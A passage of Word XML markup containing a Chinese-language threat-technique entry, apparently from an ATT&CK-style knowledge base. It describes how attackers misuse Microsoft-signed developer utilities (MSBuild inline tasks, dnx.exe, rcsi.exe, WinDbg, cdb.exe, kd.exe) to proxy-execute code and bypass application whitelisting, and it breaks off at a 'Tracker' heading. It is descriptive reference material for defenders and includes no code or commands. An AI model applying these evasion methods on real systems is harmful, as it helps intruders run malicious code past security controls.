          <w:p w14:paraId="34A95BED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>要求</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>MSBuild</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>.NET</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ramework 4</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或更高版本；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>DNX</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>.NET 4.5.2</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ower</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>hell 4.0</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>RCSI</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>.NET 4.5</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或更高版本，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Visual Studio 2012</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60385927" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CC12700" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4902122D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F8026D4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="225E9518" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Casey Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Matthew Demaske</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Adaptforward</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="218A79C9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EA5B0C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="257B0FA5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>许多软件开发相关的实用程序可用于执行各种</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>形式的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码以协助开发、调试和逆向工程。这些实用程序通常可以使用合法证书进行签名。签名后，它们就</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在系统上执行，并通过可信的进程代理执行恶意代码，从而有效地绕过应用白名单防御解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D13E882" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>MSBuild</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCBAC92" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSBuild.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft Build Engine</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Visual Studio</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的软件构建平台。它采用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>格式的项目文件，定义了各种平台的构建要求和配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A86C3A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSBuild</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过受信任的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序来代理执行代码。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET 4</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中引入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSBuild</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内联任务功能允许将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>＃代码插入到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目文件中。内联任务</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSBuild</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将编译并执行内联任务。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSBuild.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个签名的微软二进制文件，因此当它以这种方式使用时，它可以执行任意代码并绕过配置为允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSBuild.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行的应用白名单防御。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4CCB68" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>DNX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3024228F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行环境（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNX</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dnx.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是随</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Visual Studio Enterprise</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>打包的软件开发工具包。它在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2016</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年退役，转而支持</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET Core CLI</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。标准版本的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNX</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它可能仅存在于使用旧版本</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.NET Core</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP.NET Core 1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的开发人员工作站上。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dnx.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可执行文件由微软签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E9041" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dnx.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来代理执行任意代码，绕过不考虑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNX</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用白名单策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6200F251" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RCSI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595CEC0F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rcsi.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>＃的非交互式命令行界面，类似于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>csi.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。它出现在早期某版本的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Roslyn .NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器平台，但自那</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>以后</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就因集成解决方案而被弃用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rcsi.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件由微软签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD8E519" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在命令行使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rcsi.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编写和执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>C# .csx</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本文件。攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rcsi.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来代理执行任意代码，绕过不考虑执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rcsi.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用白名单策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D9CE45" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>WinDbg/CDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CAECE8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinDbg</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是微软</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核和用户模式调试实用程序。微软控制台调试程序（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cdb.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也是用户模式调试程序。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两个实用程序都包含在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件开发工具包中，可以作为独立工具使用。它们通常用于软件开发和逆向工程，在典型的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上可能找不到。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinDbg.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cdb.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件都由微软签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EF50D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WinDbg.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cdb.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来代理执行任意代码，绕过不考虑执行这些实用程序的应用白名单策略。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFCB8F8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很可能出于类似的目的使用其他调试程序，例如内核模式调试器</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它也由微软签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D50E7C5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Tracker</w:t>
      </w:r>
    </w:p>
